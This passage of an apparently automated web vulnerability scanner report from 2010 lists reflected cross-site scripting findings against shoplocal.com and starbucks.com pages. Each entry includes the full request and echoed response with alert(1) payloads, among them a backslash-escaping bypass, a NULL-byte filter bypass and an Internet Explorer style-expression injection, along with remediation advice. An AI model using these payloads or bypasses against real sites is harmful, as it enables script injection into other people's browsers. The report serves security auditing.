<!-- Copyright 2004-2008 Protopage Ltd. All rights reserved. --> <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <title>Pro ...[SNIP]... <script type="text/javascript">pageParams['6928c';alert(1)//c026ddc794a'] = unescape('1'); protopageInit();</script> ...[SNIP]...
4.276. http://www.shoplocal.com/bayareacom/coupons.aspx [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.shoplocal.com
Path: /bayareacom/coupons.aspx
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 60c86'-alert(1)-'5d576d414f6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /bayareacom/coupons.aspx?60c86'-alert(1)-'5d576d414f6=1 HTTP/1.1 Host: www.shoplocal.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: ASP.NET_SessionId=dwafkm452yd1bv55wlquhp45; path=/; HttpOnly X-AspNet-Version: 2.0.50727 Set-Cookie: SLHCookie=City=San Jose&State=CA&CountryID=0&ZipCode5=95113&Sniff=0&DMA=807&DMAName=San+Francisco-Oakland-San+Jose%2c+CA&CLat=0.651588551849194&CLong=-2.12739690490063&NLat=0.654113970446351&SLat=0.649063133252036&WLong=-2.12992232349779&ELong=-2.12487148630347&MGN=Media News Group&MGATI=bayarea&MGVD=bayareacom&MGSID=715&MGPC=95113&SessionID=0; expires=Sat, 08-Dec-2035 07:28:12 GMT; path=/ Set-Cookie: Prefs=SLHPageCounter=1&detid=9940000000&SessionCookiesSet=true; path=/ Set-Cookie: SLHCookie=couponclippings=; expires=Sat, 08-Dec-2035 07:28:11 GMT; path=/ P3P: CP="NON DSP TAIa PSAa PSDa OUR NOR IND ONL UNI COM NAV INT" X-Powered-By: ASP.NET Date: Wed, 08 Dec 2010 07:28:11 GMT Connection: close Content-Length: 63368
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head> < ...[SNIP]... <script language="javascript"> var pt = new Image(); pt.src = 'http://pt.crossmediaservices.com/pt/bayareacom/default.aspx?60c86'-alert(1)-'5d576d414f6=1&action=coupons&viewmode=local&referrer=&random=1208199366&siteid=715&City=San%20Jose&State=CA&CountryID=0&ZipCode5=95113&Sniff=0&DMA=807&DMAName=San%2bFrancisco-Oakland-San%2bJose%252c%2bCA&CLat=0.6 ...[SNIP]...
4.277. http://www.shoplocal.com/bayareacom/home.aspx [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.shoplocal.com
Path:
/bayareacom/home.aspx
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a7f6d'-alert(1)-'15a1e51a800 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /bayareacom/home.aspx?a7f6d'-alert(1)-'15a1e51a800=1 HTTP/1.1 Host: www.shoplocal.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: ASP.NET_SessionId=13czpr332qdrpbfnrkhx1w45; path=/; HttpOnly X-AspNet-Version: 2.0.50727 Set-Cookie: SLHCookie=City=San Jose&State=CA&CountryID=0&ZipCode5=95113&Sniff=0&DMA=807&DMAName=San+Francisco-Oakland-San+Jose%2c+CA&CLat=0.651588551849194&CLong=-2.12739690490063&NLat=0.654113970446351&SLat=0.649063133252036&WLong=-2.12992232349779&ELong=-2.12487148630347&MGN=Media News Group&MGATI=bayarea&MGVD=bayareacom&MGSID=715&MGPC=95113&SessionID=0; expires=Sat, 08-Dec-2035 07:27:52 GMT; path=/ Set-Cookie: Prefs=SLHPageCounter=1&detid=9940000000&SessionCookiesSet=true; path=/ P3P: CP="NON DSP TAIa PSAa PSDa OUR NOR IND ONL UNI COM NAV INT" X-Powered-By: ASP.NET Date: Wed, 08 Dec 2010 07:27:51 GMT Connection: close Content-Length: 88920
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head> < ...[SNIP]... <script language="javascript"> var pt = new Image(); pt.src = 'http://pt.crossmediaservices.com/pt/bayareacom/default.aspx?a7f6d'-alert(1)-'15a1e51a800=1&action=home&viewmode=local&referrer=&random=756043606&siteid=715&City=San%20Jose&State=CA&CountryID=0&ZipCode5=95113&Sniff=0&DMA=807&DMAName=San%2bFrancisco-Oakland-San%2bJose%252c%2bCA&CLat=0.65158 ...[SNIP]...
4.278. http://www.shoplocal.com/bayareacom/topdeals.aspx [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.shoplocal.com
Path:
/bayareacom/topdeals.aspx
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d0001'-alert(1)-'4841da7a93c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /bayareacom/topdeals.aspx?N=133245&source=bottom-hp-promo-box-photo&d0001'-alert(1)-'4841da7a93c=1 HTTP/1.1 Host: www.shoplocal.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: ASP.NET_SessionId=c4bagdm5tvansz55wjdur4vx; path=/; HttpOnly X-AspNet-Version: 2.0.50727 Set-Cookie: SLHCookie=City=San Jose&State=CA&CountryID=0&ZipCode5=95113&Sniff=0&DMA=807&DMAName=San+Francisco-Oakland-San+Jose%2c+CA&CLat=0.651588551849194&CLong=-2.12739690490063&NLat=0.654113970446351&SLat=0.649063133252036&WLong=-2.12992232349779&ELong=-2.12487148630347&MGN=Media News Group&MGATI=bayarea&MGVD=bayareacom&MGSID=715&MGPC=95113&SessionID=0; expires=Sat, 08-Dec-2035 07:29:01 GMT; path=/ Set-Cookie: Prefs=SLHPageCounter=1&detid=9940000000&SessionCookiesSet=true; path=/ P3P: CP="NON DSP TAIa PSAa PSDa OUR NOR IND ONL UNI COM NAV INT" X-Powered-By: ASP.NET Date: Wed, 08 Dec 2010 07:29:01 GMT Connection: close Content-Length: 63242
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head> < ...[SNIP]... t language="javascript"> var pt = new Image(); pt.src = 'http://pt.crossmediaservices.com/pt/bayareacom/default.aspx?N=133245&source=bottom-hp-promo-box-photo&d0001'-alert(1)-'4841da7a93c=1&action=topdeals&viewmode=local&referrer=&random=75777391&siteid=715&City=San%20Jose&State=CA&CountryID=0&ZipCode5=95113&Sniff=0&DMA=807&DMAName=San%2bFrancisco-Oakland-San%2bJose%252c%2bCA&CLat=0.65 ...[SNIP]...
4.279. http://www.shoplocal.com/bayareacom/topdealslanding.aspx [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.shoplocal.com
Path:
/bayareacom/topdealslanding.aspx
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload eff9a'-alert(1)-'017dd2487ac was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /bayareacom/topdealslanding.aspx?eff9a'-alert(1)-'017dd2487ac=1 HTTP/1.1 Host: www.shoplocal.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: ASP.NET_SessionId=uctqe055q2v2mp45ia0ki245; path=/; HttpOnly X-AspNet-Version: 2.0.50727 Set-Cookie: SLHCookie=City=San Jose&State=CA&CountryID=0&ZipCode5=95113&Sniff=0&DMA=807&DMAName=San+Francisco-Oakland-San+Jose%2c+CA&CLat=0.651588551849194&CLong=-2.12739690490063&NLat=0.654113970446351&SLat=0.649063133252036&WLong=-2.12992232349779&ELong=-2.12487148630347&MGN=Media News Group&MGATI=bayarea&MGVD=bayareacom&MGSID=715&MGPC=95113&SessionID=0; expires=Sat, 08-Dec-2035 07:28:02 GMT; path=/ Set-Cookie: Prefs=SLHPageCounter=1&detid=9940000000&SessionCookiesSet=true; path=/ P3P: CP="NON DSP TAIa PSAa PSDa OUR NOR IND ONL UNI COM NAV INT" X-Powered-By: ASP.NET Date: Wed, 08 Dec 2010 07:28:02 GMT Connection: close Content-Length: 64731
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head> < ...[SNIP]... <script language="javascript"> var pt = new Image(); pt.src = 'http://pt.crossmediaservices.com/pt/bayareacom/default.aspx?eff9a'-alert(1)-'017dd2487ac=1&action=topdealslanding&viewmode=local&referrer=&random=1649612821&siteid=715&City=San%20Jose&State=CA&CountryID=0&ZipCode5=95113&Sniff=0&DMA=807&DMAName=San%2bFrancisco-Oakland-San%2bJose%252c%2bCA& ...[SNIP]...
4.280. http://www.shoplocal.com/bayareacom/weeklyads.aspx [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.shoplocal.com
Path:
/bayareacom/weeklyads.aspx
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cc802'-alert(1)-'87982113989 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /bayareacom/weeklyads.aspx?cc802'-alert(1)-'87982113989=1 HTTP/1.1 Host: www.shoplocal.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: ASP.NET_SessionId=kj431045lgeuei45wq410hmj; path=/; HttpOnly X-AspNet-Version: 2.0.50727 Set-Cookie: SLHCookie=City=San Jose&State=CA&CountryID=0&ZipCode5=95113&Sniff=0&DMA=807&DMAName=San+Francisco-Oakland-San+Jose%2c+CA&CLat=0.651588551849194&CLong=-2.12739690490063&NLat=0.654113970446351&SLat=0.649063133252036&WLong=-2.12992232349779&ELong=-2.12487148630347&MGN=Media News Group&MGATI=bayarea&MGVD=bayareacom&MGSID=715&MGPC=95113&SessionID=0; expires=Sat, 08-Dec-2035 07:28:11 GMT; path=/ Set-Cookie: Prefs=SLHPageCounter=1&detid=9940000000&SessionCookiesSet=true; path=/ P3P: CP="NON DSP TAIa PSAa PSDa OUR NOR IND ONL UNI COM NAV INT" X-Powered-By: ASP.NET Date: Wed, 08 Dec 2010 07:28:11 GMT Connection: close Content-Length: 80970
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head> < ...[SNIP]... <script language="javascript"> var pt = new Image(); pt.src = 'http://pt.crossmediaservices.com/pt/bayareacom/default.aspx?cc802'-alert(1)-'87982113989=1&action=weeklyads&viewmode=local&referrer=&random=1732661145&siteid=715&City=San%20Jose&State=CA&CountryID=0&ZipCode5=95113&Sniff=0&DMA=807&DMAName=San%2bFrancisco-Oakland-San%2bJose%252c%2bCA&CLat=0 ...[SNIP]...
4.281. http://www.shoplocal.com/san+jose/home.aspx [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.shoplocal.com
Path:
/san+jose/home.aspx
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d77b3'-alert(1)-'5ec98484488 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /san+jose/home.aspx?d77b3'-alert(1)-'5ec98484488=1 HTTP/1.1 Host: www.shoplocal.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: ASP.NET_SessionId=ctormv552br0zm3b14ze5d45; path=/; HttpOnly X-AspNet-Version: 2.0.50727 Set-Cookie: SLHCookie=MGN=shoplocal&MGATI=&MGVD=shoplocal&MGSID=252&MGPC=60610&SessionID=0; expires=Sat, 08-Dec-2035 07:28:20 GMT; path=/ Set-Cookie: Prefs=SLHPageCounter=1&detid=9940000000&SessionCookiesSet=true; path=/ P3P: CP="NON DSP TAIa PSAa PSDa OUR NOR IND ONL UNI COM NAV INT" X-Powered-By: ASP.NET Date: Wed, 08 Dec 2010 07:28:19 GMT Connection: close Content-Length: 59956
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head> < ...[SNIP]... <script language="javascript"> var pt = new Image(); pt.src = 'http://pt.crossmediaservices.com/pt/default.aspx?d77b3'-alert(1)-'5ec98484488=1&action=home&viewmode=local&referrer=&random=853919979&siteid=252&SessionID=0&pagecounter=1&detid=9940000000&slhlogon=' + readSubCookie('SLHUID','UID');</script> ...[SNIP]...
4.282. http://www.shoplocal.com/searchlocal.aspx [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.shoplocal.com
Path:
/searchlocal.aspx
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 96ae7'-alert(1)-'43e0e349385 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /searchlocal.aspx?searchtext=macy%27s&N=150006&96ae7'-alert(1)-'43e0e349385=1 HTTP/1.1 Host: www.shoplocal.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: ASP.NET_SessionId=amfhk0bd4a0g23ji2ctacojf; path=/; HttpOnly X-AspNet-Version: 2.0.50727 Set-Cookie: SLHCookie=MGN=shoplocal&MGATI=&MGVD=shoplocal&MGSID=252&MGPC=60610&SessionID=0; expires=Sat, 08-Dec-2035 07:31:00 GMT; path=/ Set-Cookie: Prefs=SLHPageCounter=1&detid=9940000000&SessionCookiesSet=true; path=/ Set-Cookie: BroadreachLocalMode=Y; path=/ P3P: CP="NON DSP TAIa PSAa PSDa OUR NOR IND ONL UNI COM NAV INT" X-Powered-By: ASP.NET Date: Wed, 08 Dec 2010 07:31:00 GMT Connection: close Content-Length: 169501
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head> < ...[SNIP]... <script language="javascript"> var pt = new Image(); pt.src = 'http://pt.crossmediaservices.com/pt/default.aspx?searchtext=macys&N=150006&96ae7'-alert(1)-'43e0e349385=1&action=searchlocal&viewmode=local&referrer=&random=754426768&siteid=252&SessionID=0&pagecounter=1&detid=9940000000&slhlogon=' + readSubCookie('SLHUID','UID');</script> ...[SNIP]...
The value of the searchtext request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e89f6\'%3balert(1)//ad193ef8653 was submitted in the searchtext parameter. This input was echoed as e89f6\\';alert(1)//ad193ef8653 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string, then the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET /searchlocal.aspx?searchtext=macy%27se89f6\'%3balert(1)//ad193ef8653&N=150006 HTTP/1.1 Host: www.shoplocal.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: ASP.NET_SessionId=jcvqvh4514ubdj55tsoiiv55; path=/; HttpOnly X-AspNet-Version: 2.0.50727 Set-Cookie: SLHCookie=MGN=shoplocal&MGATI=&MGVD=shoplocal&MGSID=252&MGPC=60610&SessionID=0; expires=Sat, 08-Dec-2035 07:29:04 GMT; path=/ Set-Cookie: Prefs=SLHPageCounter=1&detid=9940000000&SessionCookiesSet=true; path=/ Set-Cookie: BroadreachLocalMode=Y; path=/ P3P: CP="NON DSP TAIa PSAa PSDa OUR NOR IND ONL UNI COM NAV INT" X-Powered-By: ASP.NET Date: Wed, 08 Dec 2010 07:29:03 GMT Connection: close Content-Length: 34507
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head> < ...[SNIP]... earchlocal&redirsite=adsense&channel=searchlocal%2cUNPAID&keyword=macy%27se89f6%5c%27%3balert(1)%2f%2fad193ef8653&format=NarrowFormat&adsrequested=4&n=' + numberOfAdsReturned; var query = 'macy\'se89f6\\';alert(1)//ad193ef8653'; var siteId = '252'; var channelIds = 'searchlocal,UNPAID'; var adFormat = 'n4';
The value of the searchtext request parameter is copied into the HTML document as plain text between tags. The payload e27fb<script>alert(1)</script>fed7298afb2 was submitted in the searchtext parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /searchlocal.aspx?searchtext=macy%27se27fb<script>alert(1)</script>fed7298afb2&N=150006 HTTP/1.1 Host: www.shoplocal.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: ASP.NET_SessionId=nlzoqxvmt2c2kpv5v2bjsy45; path=/; HttpOnly X-AspNet-Version: 2.0.50727 Set-Cookie: SLHCookie=MGN=shoplocal&MGATI=&MGVD=shoplocal&MGSID=252&MGPC=60610&SessionID=0; expires=Sat, 08-Dec-2035 07:29:22 GMT; path=/ Set-Cookie: Prefs=SLHPageCounter=1&detid=9940000000&SessionCookiesSet=true; path=/ Set-Cookie: BroadreachLocalMode=Y; path=/ P3P: CP="NON DSP TAIa PSAa PSDa OUR NOR IND ONL UNI COM NAV INT" X-Powered-By: ASP.NET Date: Wed, 08 Dec 2010 07:29:22 GMT Connection: close Content-Length: 34800
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
// Setup Adsense parameters google_afs_query = 'macy\'se27fb<script>alert(1)</script>fed7298afb2'; google_afs_ad = 'n4'; // specify the number of ads you are requesting google_afs_client = 'shoplocal_js'; // substitute your client ID google_afs_channel = 'searchlocal,UNPAID'; // enter your com ...[SNIP]...
4.285. https://www.starbucks.com/card [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
https://www.starbucks.com
Path:
/card
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f9196"style%3d"x%3aexpression(alert(1))"2bb14a09209 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as f9196"style="x:expression(alert(1))"2bb14a09209 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression within a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /card?f9196"style%3d"x%3aexpression(alert(1))"2bb14a09209=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: .SbuxAuth=; lf=0; ASP.NET_SessionId=lgecttv1p0hdcndyafhr1ahm; skin=;
Response
HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: -1 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Wed, 08 Dec 2010 07:41:40 GMT Connection: close Content-Length: 38019
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/s ...[SNIP]... <meta property="og:url" content="https://www.starbucks.com/card?f9196"style="x:expression(alert(1))"2bb14a09209=1"/> ...[SNIP]...
4.286. https://www.starbucks.com/card/rewards/card-rewards-canada [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
https://www.starbucks.com
Path:
/card/rewards/card-rewards-canada
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 26c4c"style%3d"x%3aexpression(alert(1))"4bdf545b85e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 26c4c"style="x:expression(alert(1))"4bdf545b85e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression within a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /card/rewards/card-rewards-canada?26c4c"style%3d"x%3aexpression(alert(1))"4bdf545b85e=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: .SbuxAuth=; lf=0; ASP.NET_SessionId=lgecttv1p0hdcndyafhr1ahm; skin=;
Response
HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: -1 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Wed, 08 Dec 2010 07:42:47 GMT Connection: close Content-Length: 37206
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/s ...[SNIP]... <meta property="og:url" content="https://www.starbucks.com/card/rewards/card-rewards-canada?26c4c"style="x:expression(alert(1))"4bdf545b85e=1"/> ...[SNIP]...
4.287. https://www.starbucks.com/card/rewards/program-information [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
https://www.starbucks.com
Path:
/card/rewards/program-information
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2f8d6"style%3d"x%3aexpression(alert(1))"d5e731ac872 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 2f8d6"style="x:expression(alert(1))"d5e731ac872 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression within a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /card/rewards/program-information?2f8d6"style%3d"x%3aexpression(alert(1))"d5e731ac872=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: .SbuxAuth=; lf=0; ASP.NET_SessionId=lgecttv1p0hdcndyafhr1ahm; skin=;
Response
HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: -1 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Wed, 08 Dec 2010 07:42:24 GMT Connection: close Content-Length: 42802
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/s ...[SNIP]... <meta property="og:url" content="https://www.starbucks.com/card/rewards/program-information?2f8d6"style="x:expression(alert(1))"d5e731ac872=1"/> ...[SNIP]...
4.288. https://www.starbucks.com/card/starbucks-gold [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
https://www.starbucks.com
Path:
/card/starbucks-gold
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4be80"%20style%3dx%3aexpression(alert(1))%206a22aa5aef0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 4be80" style=x:expression(alert(1)) 6a22aa5aef0 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression within a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /card/starbucks-gold?4be80"%20style%3dx%3aexpression(alert(1))%206a22aa5aef0=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: .SbuxAuth=; lf=0; ASP.NET_SessionId=lgecttv1p0hdcndyafhr1ahm; skin=;
Response
HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: -1 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Wed, 08 Dec 2010 07:42:39 GMT Connection: close Content-Length: 36385
